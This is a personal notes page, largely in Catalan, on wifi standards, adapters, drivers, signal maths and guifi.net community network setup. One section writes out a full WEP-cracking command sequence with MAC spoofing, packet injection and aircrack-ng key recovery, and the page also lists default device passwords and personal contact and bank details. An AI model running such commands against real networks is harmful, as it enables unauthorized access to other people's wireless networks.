home / infca / wireless From faster, smaller, cheaper to simpler

Arcadi | Irina | guifi Links | End

Xarxes inalàmbriques

Dedicat a en Jordi Buzón.
Tú sí que sabes motivarme.

WiFi 9106 CN-WF511 Tech stuff Exploit CD WiFi vs BT Mobils

Entorn WiFi

Amunt! Top Amunt!
802.11a (wiki) - The 802.11a standard uses the same core protocol as the original standard (ratified in 1999), operates in 5 GHz band, and uses a 52-subcarrier orthogonal frequency-division multiplexing (OFDM) with a maximum raw data rate of 54 Mbit/s, which yields realistic net achievable throughput in the mid-20 Mbit/s.

Using the 5 GHz band gives 802.11a a significant advantage, since the 2.4 GHz band is heavily used to the point of being crowded. Degradation caused by such conflicts can cause frequent dropped connections and degradation of service. However, this high carrier frequency also brings a slight disadvantage: the effective overall range of 802.11a is slightly less than that of 802.11b/g; 802.11a signals cannot penetrate as far as those for 802.11b because they are absorbed more readily by walls and other solid objects in their path.

Wi-Fi (Wireless Fidelity) standard
Norma : 802.11b (1091 K) 802.11a is used by OTAN in Europe.
Arquitectura : Get all 802 !
Frequency band : 2,400 - 2,4835 GHz (Industrial Scientific Medical Band).
Legislación española : ver S5.150 en S5_1.doc de Sección III : disposición del cuadro de atribución de bandas de frecuencias. Channel 10-11 (Spain).

 f (bottom of band) = 2,4 GHz => λ = 12,5 cm.
 f (top of band) = 2,4835 GHz => λ = 12,08 cm.

A common design for antennas is to make them 1/4 of a wavelength or less in length.

2,462 GHz is channel 11
Velicitat de transferència : 11 Mbps
Radio type : frequency hopping spread spectrum (FHSS)
Modulation : QFSK, BFSK, DBPSK
Hardware comparisons : Seattle
Receive sensitivity : FreeNetworks
Atenció a la seguretat : el AirSnort crakeja les claus d'encriptació ! I el WEPCrack !

ExtremeTech diu :

 WEP (wired-equivalent privacy) = encryption scheme for wireless traffic.
 Tools are readily available to break 40-bit WEP in a few minutes, and 128-bit WEP keys can be broken in a few days.

El AiroPeek (protocol analyzer) preten arreglar-ho.

IBM diu

 Existing security for 802.11 wireless consists of two subsystems :
a data encryption technique called Wired Equivalent Privacy (WEP) and an authentication method, either Shared Key or 802.1x.
Both the encryption and authentication are optional, and wireless access points are typically shipped with both turned off.

I té el DWSA
Un article amb els esencials de la seguretat WiFi casolana.

WEP security

New WEP cracking tools : WEP.HTM

"WPA Cracking" ... "128 Bit WEP cracking" here "The minimum number of characters for a WPA-PSK passphrase is 8. The maximum is 63."

Chez moi :

 Enc   Cipher   Aut
----- -------- -----



Servidors (Access Point)




Clients : wireless card, tarjes Wi-Fi (802.11b)

  • Lucent

  • Orinoco (15 dbm power output)

  • Apple Airport

  • Cisco

  • Linksys

  • D-Link : DWL-650 PCMCIA is cheap and has Linux support

  • Edimax
    • PCMCIA
      • EW-7102PC = Wireless LAN PCMCIA adapter (*linux*)
      • EW-7103PC = Wireless LAN PCMCIA adapter (*linux*)
    • USB
      • EW-7112U = Wireless LAN USB adapter
      • EW-7115U = Wireless LAN USB adapter
    • PCI
      • EW-7122 = Wireless LAN PCI adapter (*linux*)
      • EW-7123 = Wireless LAN PCI adapter

  • Surecom
    • PC Card : EP-9427
    • USB Card : EP-9001

  • En Jordi te una PCMCIA Edimax, EW-7102 PC
    A Edimax seccio "products" + "wireless" :
    • EW-7103 PC : pcmcia wireless network adapter, 12 dBm output power (typ), -80 dBm receiver sensitivity (min). Coverage area : closed space (25m).
    • EW-7123 PC : pci wireless network adapter
    • EW-7205 AP : access point. Data packet bridging between wireless network (802.11b) and Ethernet network (802.3). Operating range : open space (100-300m), indoor (35-100m).
    Per les WS amb USB, en Jordi té una Edimax 7115-U

  • En Bulma recomana Conceptronic.
    Ep : a BCN es troba a Pricoinsa & JUMP (IE only) [Rda Sn Antoni, 38] & FNAC
    La Conceptronic PCI C11iDT porta una antena exterior !

  • A Seattle recomanen Lucent Silver/Gold (Hermes chipset)
    On the Prism chipset, ther's a lot of manufacturers.

  • Araceli has a Conceptronic Wireless 54Mbps adaptador USB

  • SAG has a wifi card !

  • A wifi dongle is a common name for a wireless USB adapter, which is the same thing as a WiFi card except it uses a USB interface instead of PCI or PCIe.

  • Monitor mode is one of the six modes that 802.11 wireless cards can operate in:
    • Master (acting as an access point),
    • Managed (client, also known as station),
    • Ad-hoc,
    • Mesh,
    • Repeater,
    • and Monitor mode

    Mes detall {wireless.kernel.org}




Edimax EW-7115U

  • Library : Transmit power = 15 dBm, Receive sensitivity = -80 dBm.
  • datasheet or PDF
  • Torrelles :
    2 WS s'han conectat quan hem posat "AdHoc" + (E)SSID
  • W2K :
    • Install under W2k :
      do not plug the USB adapter until the Application setup has been completed
      To install the drivers and the "Configuration & Monitor utility", run setup.exe from the CD.
    • Uninstall under W2k :
      • to remove the "Monitor & Configuration utility", select "Uninstall Configuration & Monitor utility" option (Start -> Programs -> Amter 802.11 Wireless LAN). It is recommended to stop the USB adapter and "Exit" the application !
      • to uninstall the USB adapter, select it in the Devide Manager, and press "Uninstall" - can be performed only if the USB adapter is plugged in
  • Linux + USB : Atmel AT76C503 based wireless USB devices. VID=0x03EB, PID=0x7603, MAC=AT6C503A, Radio=RFMD (not Intersil).
    Another similar (identical) place
    How to build and install the GPL drivers.
    Another HowTo.
    SuSE 8.0 (and more) specifics (config).

US Robotics 9106

Amunt! Top Amunt!


9106 Specifications [url]

    * Network address translation (NAT)
    * Integrated 802.11g (54Mbps) wireless access point
          o 54Mbps data rate with auto fallback
          o 2 x detachable 2 dBi reverse SMA antennas
          o Support for WEP and WPA-PSK
          o Mac address filtering
          o Disable SSID
    * Integrated ADSL modem - 1 x RJ11 connection - velocitat ?
    * 4 x 10/100Base-T auto MDI-MDIX RJ45 switched LAN ports
    * Built-in firewall with stateful packet inspection (SPI)
    * Integrated DHCP server
    * Virtual private network (VPN) pass-through
    * UPnP enabled
    * DMZ hosting and port forwarding
    * Web-based & remote configuration
    * 2 year manufacturer warranty



 El modelo del ADSL Wireless Gateway
 Model 9106 ¢ USR209106

 Amunt! Top Amunt!
My Wifi cards
P4 / Airis : Canyon CN-WF511

Chipset & driver by fabricante : url

Mine : URL

Norma = 802.11g, ID del producto = CN-WF511, Interface = PCI, Chipset = Ralink (chip RT2560F), Driver = rt2x00, Trabaja con Linux = verde.

Comentarios - driver available from manufacturer: http://web.ralinktech.com/ralink/Home/Support/Linux.html
=> http://rt2400.sourceforge.net/
=> http://rt2x00.serialmonkey.com, or http://sourceforge.net/projects/rt2400.

3 fotos :


Ubuntu lspci says : Intel Corp. PRO/Wireless 2200 BG (rev 05)
So, it is a IPW2200 BG card

Norma = 802.11g, ID del producto = 2200BG, Vendedor y código del producto = man:8086 dev:4220, Interface = mini-PCI, Chipset = IPW2200, Driver = ipw2200, Trabaja con Linux = verde
Comentarios : http://ipw2200.sourceforge.net/


T400 (Abr 2010)
Integrated card

XP says : Intel(R) WiFi Link 5100 AGN ; mac = 00:22:FA:D1:5A:90 ; driver = NETw5x32.sys ;

AIR-PCM352 (pcmcia)

XP says : "Cisco Systems 350 Series PCMCIA Wireless Adapter : driver = pcx500.sys ;
soft, download.

Belkin Play N600, model F7D4101v2 (Oct 2014)

Play N600 USB Wireless N Dual Band.

Help (Spain) : 902.02 43 66

ISO (146 MB)

Tech stuff

Amunt! Top Amunt!
  • Free Networks
  • dB = 10 * log(a/b) ; 'a' and 'b' is power in mW
  • dBm = 10 * log(P) ; for dBm, 'b' is 1 mW.
  • A dBm is power level referenced to 1 milliwat => 0dBm = 1 mW.
  • 1 W => 10 log 1000 mW / 1 mW = 10 log 1000 = 10 * 3 = +30 dBm
  • 100 mW = +20 dBm
  • 10 mW = +10 dBm
  • doubling the power increases the reading by slightly more than 3 decibels, actually close to 3.010299 dB : 10 * log(base 10) 2 = 3,01029995664
  • 3 dBm + 3 dB = 6 dBm ( 2 mW * 2 = 4 mW )
  • 3 dBm - 3 dBm = 0 dB ( 2 mW / 2 mW = 1 )



+ 3dB     log
x 2     log
0 1
3 2
6 4
9 8
10 10
12 16
15 32
18 64
20 100
21 128
24 256
27 512
30 1024
30 1000



Pèrdua de senyal a l'espai lliure :

  Loss = 32 + 20 x Log ( F x D ) 
 Loss = free space path loss in dB
 F = operating frequency in Mhz
 D = distance in Km
 Include a fade margin of about 10 dB ...
So for a simple example, how far can a pair of Wavelan cards get with the little supplied patch antennas of 8 dbi ? The answer is :
 Tx power = + 20 dbm
 Combined antenna gains = 16 ( 8 + 8 )
 Rx sensitivity = -74 dbm
 Total link budget = 20 + 16 - ( -74 ) = 110 db
 Max distance = 4 km aprox

 loss = 32 + 20 x log (2450 x 4) = 111.

 With 10 dB margin we have :

    100 dB > 32 + 20 x log ( 2450 x d )
     68/20 > log ( 2450 x d )
     10 exp (68/20) / 2450 > d
     d < 1,025 Km
Bluetooth uses 1mW to reach 10 m [verify]



  • Wlan Primer and FAQs

    Every device (wireless card) in an 802.11 network is known as a station (abbreviated STA). A collection of stations that communicate with each other is known as a Basic Service Set (BSS), which covers a certian Basic Service Area (BSA). Stations that are not within the BSA can't directly participate in a BSS with each other.
    When stations are participating in a BSS, they share a common set of network parameters. They all transmit/receive on the same channel, they understand the same data rates, they use a common BSSID, and they are synchronized to the same timer. In a BSS, all of those parameters are broadcast in beacon frames that are sent at a regular interval.
    Two BSS's could coincidentally share the same channel, common data rates, and timer, so some unique identifier is necessary. That unique identifier is a 6-byte number that identifies the BSS (the BSSID). Packets in a BSS, in addition to being addressed from one station to another, also include the BSSID.
    There are two kinds of BSS's: the independent BSS (IBSS) and the infrastructure BSS.
    An IBSS is usually an ad-hoc network, and they're meant for peer-to-peer networking. An IBSS resembles a bunch of computers on the same Ethernet segment--they can all hear each other, and packets are sent directly to the recipient. In an IBSS, all of the stations are responsible for sending beacons, and the BSSID is randomly generated.
    In an infrastructure BSS, there is exactly one access point (AP). When one station wishes to send data to another station, the packet is sent first to the AP, and then the AP delivers the packet. The BSSID of an infrastructure BSS is the MAC address of the AP's station interface, and the AP is the only station that sends out beacons. The AP is sometimes known as the BSS master, and the other stations are BSS clients.
    802.11 networks grow by combining infrastructure BSS's into larger Extended Service Sets (ESS's), which cover Extended Service Areas (ESA's). In order for stations in one BSS to talk to stations in other BSS's, the stations must take advantage of distribution system services (DSS). The distribution system (DS) is the magical thing that connects BSS's into one ESS, and it's defined by the services that AP's connected to the DS provide.

  • SSID = Service Set Identifier.
    32-byte string that identifies an IBSS or an ESS (or a single infrastructure BSS). It's often called the network name or ESSID. The SSID is a unique ID given to the Access Point.
    Wireless clients associating to any Access Point must have the same SSID. Alternatively, "ANY" (all characters in upper case) may be used.
    BSSID - basestation ID. (Access Point MAC address)

  • Infrastructure = with Access Point, AdHoc = without Access Point.

    In Ad-Hoc mode : Ad-Hoc network is a group of computers, each with a WLAN adapter, connected as an independent wireless LAN. All stations in the WLAN should set the same ESSID and operation channel. Each node (station) acts as a router for the other nodes. See Snoop
    In Infrastructure mode : an integrated wireless and wired LAN is called an Infrastructure configuration. Set the ESSID to be the same with the AP you associate to.

  • RTS threshold - mechanism implemented to prevent the "hidden node" problem.
    A packet size is specified, and the RTS/CTS mechanism will be activated if the packet size exceeds the specified value.

  • pigtail - cable (corto, flexible) que tiene en un extremo un conector N para enroscar la antena, y en el otro extremo un conector específico que se acoplará en nuestro hardware wireless. Few pictures

Get a packet monitoring tool for wireless LAN

See Sniffer 4.6 [12 dolars]
AirMagnet Duo complementing Sniffer Wireless article
And Snort [for W2K]
Here is a wireless kismet scanner (requires driver in promiscous mode) Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system.
Windows ones :
  • SpyNet sniffer : CaptureNet v3.12 + PeepNet => "Iris" Network Traffic Analyzer
  • CommView v2.0 sniffer
Read about Anti-Sniff. Also about packets and protocols ! Even points to GG243376 !
In Win2000Mag also ! [NT only !]
 AntiSniff exploits the method NT uses to handle packets by sending a packet to the system
 using an Ethernet address of FF:00:00:00:00:00
 and the IP destination address of the system you want to check.
 When a network card is operating in promiscuous mode in NT,
 it will respond to the packet that AntiSniff has sent,
 revealing that a packet sniffer might be active on the system.

 For its DNS tests, AntiSniff puts itself in promiscuous mode
 and sends a packet out on the network using a predetermined IP address
 in the packet header. If a packet sniffer is listening on the network
 and configured_as some are_to perform reverse
 DNS lookups for the packets it captures, then the system running the
 packet sniffer will transmit a reverse DNS lookup request for the IP
 address in the packet AntiSniff sent.
 The product captures that particular action (the reverse DNS lookup),
 tricking the packet sniffer into revealing itself on the network.

Other network analyzers :

List of sniffers : http://www.packetattack.com/wireless.html - and more ! [*****]

War driving : MacStumbler (Airport wireless cards only)

Read WEP


Auditor Security Collection

From here
BackTrack is the result of the merging of the two innovative penetration testing live linux distributions Auditor security collection and Whax. : BackTrack download : v3 Beta - 14-12-2007, v4 bt4-beta.iso 02/2009. 2010 new home : http://www.backtrack-linux.org/.

See also WifiSlax (v 3.1, 683 MB, at 2007/12 has kernel, meaning no "iwlagn" for T400), KisMet, Stumbler (guindous). Nice Blog.

Centuriones !

Kernel := 2.6.6 ! [10/01/2005]
MacChanger :

     -s eth0 => 00.02.8A.3C.31.4F
     -s eth1 => 00.09.6B.86.5C.57
     -m => provide New AA.BB.CC.DD.EE.FF

Auditor-200605-02 : !IMPORTANT!!
This version has two different ISO versions, becasue the Intel B and the Intel B/G card drivers IPW2100 and IPW2200 does not work well in cooperation. While B cards does not seem to have a problem, systems with B/G cards (ipw2200) seemed to hang during boot. To overcome this problem (until the drivers are fixed) we release two iso's of the CD to support your needs. If you want to be able to use Auditor Security Collection on a system with an IPW2200 card you need to download the "-no-ipw2100" version of the iso otherwise it will not boot. A system with B card based on IPW2100 will work with it, but no driver will be loaded for the B only card. If you never run it on a System with IPW2200 take the "ipw2100" version, the ipw2100 driver is included in this version.

List of tools.
Device list


Homepage : http://www.backtrack-linux.org/, but drac is from Legacy Filmworks ! (2014) -> Kali

To start BT4 :

  • network : /etc/init.d/networking start ;
  • KDE : startx ;
  • FVWM : bt4-crystal ;
Eines al BT4

Les utilitats que hi ha al BT4 son :

aircrack-ng - airmon-ng - AirSnarf - ASLEAP - Automated LEAP attack tool- tool to Crack Cisco LEAP, August, 2003. SourceForge. Cowpatty - Genpmk - Kismet - Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. url MacChanger -
wifi cards

To display card manufacturer to Linux driver compliance : http://linux-wless.passys.nl/.
How to display vendor &: product code :

# lspci -vv | grep Intel {for a PCI card : read here} 00:0b.0 Network controller: Intel Corporation PRO/Wireless 2200BG (rev 05) Subsystem: Intel Corporation: Unknown device 2702 Now, look for the device number: # lspci -n | grep 00:0b.0 00:0b.0 Class 0280: 8086:4220 (rev 05)
Acradi Acer Aspire 5741
$ lspci 03:00.0 Network controller : Broadcom Corporation device 4357 (rev 01) Subsystem : Foxconn International Inc, device E021 Kernel drive in use : wl # lspci -n | grep 03:00.0 03:00.0 0280: 14e4:4357 (rev 01)

BCM page has move to b43 driver page.

When booting BT4, I find

$ cat /var/log/messages | grep Broadcom bt kernel: eth0: Broadcom BCM4357 802.11 Wireless Controller

Also I find
$ iwconfig eth0 IEEE802.11bgn ESSID:"" Nickname:"" Mode:Managed Frequency:2.412 GHz Access Point: Not-Associated

No permet ficar-se en mode tafaner :
$ iwconfig eth0 mode monitor SET failed on device eth0: invalid argument.

Pero si es pot configurar si sabem la clau :
$ iwconfig eth0 mode managed
Irina Acer Aspire 6930
$ lspci 07:00.0 Network controller : Intel Corporation, Wireless WiFi Link 5100 Kernel drive in use : iwlagn Kernel modules : iwlagn $ lspci -n | grep 07:00.0 07:00.0 0280: 8086:4232

ipw5100 uses iwlagn driver : green, wlan type := 802.11a/n, vendor & product code := man: 8086 dev: 4237, mini-PCIe.

Al log trobo :

$ cat /var/log/messages bt kernel: iwlagn 0000:07:00.0 Detected Intel Wireless WiFi Link 5100AGN REV=0x54

El nostre device és wlan0 :

$ iwconfig wlan0 IEEE802.11abgn ESSID:"" Mode:Managed Frequency:2.412 GHz Access Point: Not-Associated

El configurem :

$ ifconfig wlan0 down $ macchanger -m 00:11:22:33:44:55 wlan0 Current MAC: 00:21:5d:4c:3e:d0 (unknown) Faked MAC: 00:11:22:33:44:55 (Cimsys Inc) $ iwconfig wlan0 mode monitor $ ifconfig wlan0 up

Anem per feina :

$ airodump-ng wlan0 veure xarxes : WLAN_C5, ch 3, BSSID 00:19:15:4F:92:AA ; $ airodump-ng --channel 3 wlan0 veure nomes dades del canal 3 $ airodump-ng -c 3 -w test -bssid 00:19:15:4F:92:AA wlan0 esperar paquets #Data (no tancar finestra !) $ aireplay-ng -1 0 (-e WLAN_C5) -a 00:19:15:4F:92:AA -h 00:11:22:33:44:55 wlan0 do associate to router $ aireplay-ng -3 -b 00:19:15:4F:92:AA -h 00:11:22:33:44:55 wlan0 entrar pakets per a que #Data pugi mes rapid, fins 10.000 ! $ aircrack-ng -b 00:19:15:4F:92:AA test-01.cap desxifrar : wait "KEY FOUND" $ iwconfig wlan0 mode manakeg key 31:32:33:34:35:36:37:38:39:30:31:32.33 conectar al router amb la clau $ dhcpcd wlan0 get IP $ ifconfig wlan0 display configuration $ ping www.google.es use Internet ;

BT forums.

  • boot CD
  • login as "root" / "toor"
  • either :
    • "startx" = engegar entorn Xwindow
    • "xconf" = configurar tarja gràfica
    • "ifconfig eth0 up" = engegar xarxa local
    • "pump" / "dhclient" = get an IP from the DHCP server
    • si hi ha problemes, mirar /var/log/messages o /var/log/syslog
  • Airis P4 : Canyon CN-WF511 Ralink RT2500 Wireless LAN Card => RT2500 chipset Driver URL ; card description ; driver download {win} ; T42:\Fonts\WireLess\Drivers\P4_Airis\rt2500-1.0.0.tar.gz
  • T42 : Intel Corp. PRO/Wireless 2200 BG (rev 05)
  • ataque fragmentación / get PRGA - Sample.
    • configurar wireless :
      iwconfig ra0 rate 1M channel 6 mode monitor
    • start airodump :
      airodump-ng --ivs -w clave -c 6 ra0


LEAP is ...

Asleap is ... - Automated LEAP attack tool. Another tool : LEAP cracker.

few links : Flim; VT - blog.


Guifi homepage. Torrelles Google group, foro, email incidencies, e_mails, nif(), iban(ES47 0081 0122 28 0001139623) / BSAB ESBB
Si no et funciona ho dius al googlegroup i posa el IP de la teva antena. En Lorenzo s'ho va mirant. Boi tf 637.979.121

Contacte : Daniel Sanchez; Edgar

e1001 administració Torrelles : eeeiii, Israel Antúnez@eeeiii.net, Carlos Vargas@eeeiii.net, samsitper : cementiri o campanar

Tf informació : 93.689.02.91 ; Serveis.

Guifi Baix coop

Contacta amb Interbaix, potser pot donar-vos sortida:
A/At. Josep Alacid
Jacint Verdaguer, 144 ; Sant Boi de Llobregat ; (08830) Barcelona
ms2k@interbaix.com, 93 654 82 08 / 09
Servei : josep alacid (gMail)

Torrelles, 31/07/2010 :

Network Name Signal Strength Encryption Wireless Mode Channel MAC Address guifi.net-TDLCmpnrAP4 17% Open network 802.11a 104 00:0C:42:61:A7:43 guifi.net-wds-TDLCmpnPtOmnia 44% Open network 802.11a 132 00:0C:42:3A:EB:D0 guifi.net-TDLCmpnrAP1 37% Open network 802.11a 36 00:0C:42:3A:E7:24 guifi.net-TDLCmpnrAP3 35% Open network 802.11a 44 00:0C:42:61:A5:F9

4 nodes (2010) :

Proxy = proxy.torrelles.guifi.net:3128, ip= Proxy Type = HTTP {no SOCKS}. Punt Omnia = Tercer proxy :

El proxy de Torrelles és el node 30627. El el TDLCampanar es 30648. Tots els nodes de Torrelles

Home, 20151025 :

Network Name Signal Strength Encryption Wireless Mode Channel MAC Address WLANGAS2 70% Encrypted 802.11g 9 40.4A.03.AF.5B.FB WifiLluis 68% Encrypted 802.11n 1 00.F8.1C.91.4A.DD

Eina mesura velocitat (IP = ADSL (ping 21 msg), CNET, Speed Test,

{201410} 8 Mbps (baj), 12 Mbps (sub)
{201411} 5 Mbps (baj), 8 Mbps (sub)
{20141207, 08h} 6,5 Mbps (baj), 8 Mbps (sub)
Pero baixo fitxers a 300 KBps = 2,4 Mbps.
{14/8/2015, 07:05} 5968 kbps = 746 KB/sec baixada, 8776 kbps = 1097 KB/sec pujada. Ping: 18 ms. Jitter: 24 ms.

[castelldefels] | [tabor] - AP1 : ( | | | AP2 : ( | | | AP3 - ( | | | | | .--- [cementiri] - AP1 - | | - AP2 - | | | .------[CanColl] - AP1 : | - AP2 : | [campanar] - AP1 : - [ST1] -. AP2 - - [ST1] ---- [Punt Omnia] - AP3 : - [ST2] AP4 - - [ST2] ---- [Ajuntament] - CanCollTabor CanColl-guifiGy CmpnAjuntmnt CampanarST2
nodes / IPs / usuaris / emails
node IP connected to nom / email
33491 campanar, Sebastia Altemir
32747 tabor Jordi Buzon
mode "sense proxy"

Des Juny de 2014 no cal posar proxy als usuaris que paguem. Funciona el FTP de conya.

Router Comtrend CT-536+

En Jordi em deixa un router Comtrend HG536+ o CT-536+ {nov 2010} User: admin. Password: admin. MAC: 01:15:F2:EB:53:2B ;

Com que la NS5 agafa ... doncs li posem al router !
Li dones la ip per ex: al comtrend i li poses els dns (nano), desactives el dhcp del comtrend i deixes activat el de la nano. Despres has de anar a l'apartat quality of service del comtrend i eliminar el que hi ha, per tal de poder utilitzar els 4 ports lan, ja que dos son per iptv i hg. {ignasiferrer@guifi.net}

Ports especials (2)
No es necesario que metas ningún firmware anterior. Simplemente has de entrar en la configuración del router > Advanced Setup > Wan y verás 2 conexiones. Deja la pppoe_8_35 y borra la otra. En cuanto salves los cambios y rebotes el router, tendrás los puertos 3 y 4 listos para funcionar con normalidad. Consejo: si haces un backup del router antes de eliminar esa conexión wan, siempre podrás restaurar el router a su punto inicial. Te lo digo por si más adelante quisieras usar tv o voip.

Router ZyXEL P660HW-D1 (timofònica)

20150106 : mac = 40.4A.03.AF.5B.FB

Per guifi:

Tron diu :
Tens de entrar per navegador en la pestanya LAN/LAN Setup/DCHP. A TCP/IP s'ha de posar amb la mascara, la seguent opció en "Both", la de sota en "RIP-2B" i la última en "IGMP-v2".

Firmware original (no "capat" per tfca) : pàgina del fabricant.

Reset to factory settings

With the router powered on, push "Reset" micro-button for about 30 seconds.

Default user/pwd = 1234/1234 ;

guifi.net configuration
servei de Internet

201506 - WhatIsMyIP diu :

Proxy: No Proxy Detected City: Barcelona State/Region: Catalonia Country: ES - es flag ISP: Adamo Telecom Iberia S.A. Your IP:

NetCraft i nmap :

c:\> nmap Starting Nmap 6.47 ( http://nmap.org ) at 2015-05-18 10:31 Romance Daylight Time Nmap scan report for cli-5b7ef188.bcn.adamo.es ( Host is up (0.086s latency). Not shown: 990 closed ports PORT STATE SERVICE 21/tcp open ftp 23/tcp open telnet 53/tcp filtered domain 80/tcp open http 81/tcp open hosts2-ns 1723/tcp open pptp 2000/tcp open cisco-sccp 3389/tcp open ms-wbt-server 8080/tcp open http-proxy 8291/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 22.69 seconds

201507 -

c:\> nmap Starting Nmap 6.47 ( http://nmap.org ) at 2015-09-17 10:31 Romance Daylight Time Nmap scan report for 17.Red-88-0-20.dynamicIP.rima-tde.net ( Host is up (0.041s latency). Not shown: 970 filtered ports, 28 closed ports PORT STATE SERVICE 80/tcp open http 1723/tcp open pptp Nmap done: 1 IP address (1 host up) scanned in 10.97 seconds
SAG @ guifi.net

My Doc : T430\\MisCosas\Guifi.net\guifi_a_Torrelles_sag.docx. Guifi_at_Torrelles.doc 2 Albert Homs.

08/11/2010 - compro una NanoStation 5 "loco" { NS5 from now on } ;

Antena client wifi 5 GHz nanostation5 loco; 13 dBi, 150 mW, WimaCom 65 € amb IVA ; Cilctel 68 € - [2x PLC = 80 €] ; Setup Informatica 78 € ;

IP = ;
usr/pwd = ubnt (root/guifi after OneTouch cfg, file "unsolclick.cfg"; also nano5's IP is after this moment, so you'd better change router IP to;
OpSys = AiROS v 3.5 ;
MAC = (1012L) 00:15:6D:18:C8:95 ;

El fitxer de configuracio de la NS5 s'agafa d'aqui : anar al node, escollir solapa "Trastos", escollir "unsolclic" i obrir enllaç.

Tot el que es pot fer amb una NanoStation loco ("2" o "5") ... Acacha [*****] - all menus, IP (, etc etc

NS@guifi ; Forums (cat). Proxy's. Users.

El meu node és el 33491, soc el usuari 14116, i la meva IP interna : (GateWay, DNS De l'exterior es veu {2014} o {20151023} {20151106, Igualada 08700, Telefonica}

detalls de la meva ferralla actual
nano-5 ZyXel TPsag TPnav TPaav TPiav mac 00:15:6D:19:C8:95 40:4A:03:AF:5B:FB (lan)00:22:68:1F:D0:E4 aa:bb:cc:dd:ee:ff 00-16-36-A7-9E-B2 (LAN) 00-23-8B-12-3E-30 (LAN) ip 192.168.1.xx 192.168.1.xx 192.168.1.xx u/p root/guifi admin/admin (wifi)00:21:6A:B6:CD:56 00-10-A7-2C-42-1A (WiFi) 00-1A-73-03-18-45 (WiFi) 00-21-5D-4C-3E-D0 (WiFi)
esquema de la meva ferralla actual
.-----------​​--​​-​​​-​​--. .---------------. .---------------. | ​​ ​​ ​​​ ​​​| | | | | | Antena ​​ ​​ ​ ​ ​​​ ​| ​ ​​(1)​ | Router | (2)​ | PC | | NanoStati​​on​​ ​5​ ​​| ========== | ZyXel | ========== | Windows 7 | | ​​ ​​ ​​ | | | | | | ​​ ​​ ​​ | | | | | .-------------​​-​​-​​-​​-. .---------------. .---------------. Default values Default values IP = ; IP = ; u/p = ubnt/ubnt ; u/p = ​1234/​1234 ; Configured values Configured values Configured values IP = ; IP = ; IP = ; u/p = root/guifi ; u/p = ​1234/mypwd [] Network Mask = ; {use IE} Default Gateway = ; DNS = / ;
NanoStation 5

És bàsic que l'antena tingui senyal del Campanar i es pugui veure des un browser:


Si en accedir a la NS5 ens diu


Change Chrome advanced flags to support SSL v3.0 :

  1. in the Chrome address bar type: chrome://flags
  2. scroll down to Minimum SSL/TLS version supported and change it to SSLv3
  3. restart chrome

En la mateixa IP (NS5,, Firefox em diu

Firefox cannot guarantee the safety of your data on because it uses SSLv3, a broken security protocol. Advanced info: ssl_error_unsupported_version

Altres error usuals :



nodes de amics

Jordi : TDLfcoromines15, nodo 32747, - La distancia y al parecer los obstaculos al nodo de Can Coll parecen correctos - distancias.

Pere Olle. E1001 Jordi. Carles S. Ramon, ip =


RiuMorell a RiuMar, Agusti ; a Riumar no utilizem Nanostations; utilitzem SXT 5HPnD a 5 Ghz de Mikrotik Pots connectar-te a la xarxa amb un sencill scan desde l'antena. Forum Mikrotik.
Mario Figueres Casanova, tf 636.878.611
Node Lluis Crespo

my MACs
44:74:6c:d1:9a:08 - sony Xperia sag 6C:88:14:0E:D5:E0 - T430 sebas f0:7b:cb:11:f2:5c - arcadi acer
Problemes DNS

{Israel Antunez} Li recomanem que, si te configurat aquest proxy, el canvii pel del punt omnia ip:, port: 3128

{Carlos Vargas} Mentre dura aquest incident, us aconsellem que utilitzeu el proxy del Punt Omnia,


OK Filezilla client
s'ha de configurar el Proxy amb Squid.

Filezilla : Edita, Paràmetres, Connexió, Servidor Intermediari Genéric, marcar tipus HTTP 1.1, IP+port+usr+pwd.
Te bajas el ultimo Filezilla Client ( de aki : url
Lo arrancas y vas a : edit, settings, connection, "generic proxy", escoges HTTP/1.1 using CONNECT, pones nuestro proxy:puerto y luego user:pwd.
Total Commander 7.55a, File Manager amb FTP integrat, con el modo FTP on HTTP.


WGET : fer un CMD que contingui

echo "WGET per Guifi.net de la url (" %1 ")." set http_proxy=http://proxy.torrelles.guifi.net:3128 c:\eines\WGET.EXE --proxy-user=usuari.guifi --proxy-passwd=clau.guifi %1

VPN ? - no hi arriba (VPN bisc tfca). OK == Connection refused. - no hi arriba (VPN bisc colt). OK == Connection refused.

IM = Instant Messanging

Messenger - si "v 2009"
Ir a IE : cfg proxy:port Ir a Messenger : Herramientas, Opciones, Conexion, Configuraciones Avanzadas. Ver proxy y puerto de IE + poner usr+pwd

Alternatives : pidgin - universal chat client : homepage; AMSN ; Browser based : eBuddy.


SkyPe - si "v"

Remote Desktop

Remote Desktop o escriptori remot per proxy : TeamViewer.

With TeamViewer you can remotely control any computer as if you were sitting right in front of it - even through firewalls. All your partner has to do is start a small application, which does not even require installation or administrative rights. No installation is required, just run the application on both sides and connect - even through tight firewalls.


Spotify ?
Abrimos Spotify y nos vamos a Edit > Preferences. En la parte de Proxy seleccionamos HTTP, e ingresamos la direccion y el puerto. No olvidar presionar Apply para guardar los cambios. Reiniciamos el programa.
Confirmacio : url
Alternativa : http://listen.grooveshark.com/, as "Jamendo/Magnatune" at Ubuntu ... {Francisco says}


WinAmp - si "v 5.56" : General Preferences + usr:pwd@
Radio Paradise


This is the path to external world {I am}:

c:\> tracert -d www.google.com Tracing route to www.google.com [] over a maximum of 30 hops: 1 3 ms 2 ms 2 ms 2 5 ms 3 ms 2 ms ; dGW, AP1 Campanar 3 5 ms 3 ms 3 ms ; AP3 Campanar 4 6 ms 4 ms 4 ms 5 6 ms 4 ms 4 ms 6 10 ms 12 ms 5 ms 7 11 ms 5 ms 5 ms 8 10 ms 7 ms 8 ms ; 115.Red-80-58-67.staticIP.rima-tde.net 9 19 ms 18 ms 21 ms ; 245.Red-80-58-118.staticIP.rima-tde.net 10 20 ms 15 ms 19 ms ; 1.Red-80-58-106.staticIP.rima-tde.net 11 20 ms 16 ms 19 ms ; ae3-0-gramadno2.net.telefonicaglobalsolutions.com 12 18 ms 18 ms 18 ms ; google-ae2-gramadno2.net.telefonicaglobalsolutions.com 13 17 ms 16 ms 16 ms 14 19 ms 22 ms 17 ms 15 18 ms 20 ms 16 ms ; mad01s25-in-f4.1e100.net Trace complete.

From Colt I can't reach my IP:

c:\> tracert -d Tracing route to over a maximum of 30 hops 1 <1 ms <1 ms <1 ms 2 1 ms 1 ms 1 ms 3 1 ms 1 ms 1 ms 4 * * * reports: Destination net unreachable. Trace complete.
  1. ping (router)
  2. ping (nanostation)
  3. ping (own)
  4. ping (GateWay)
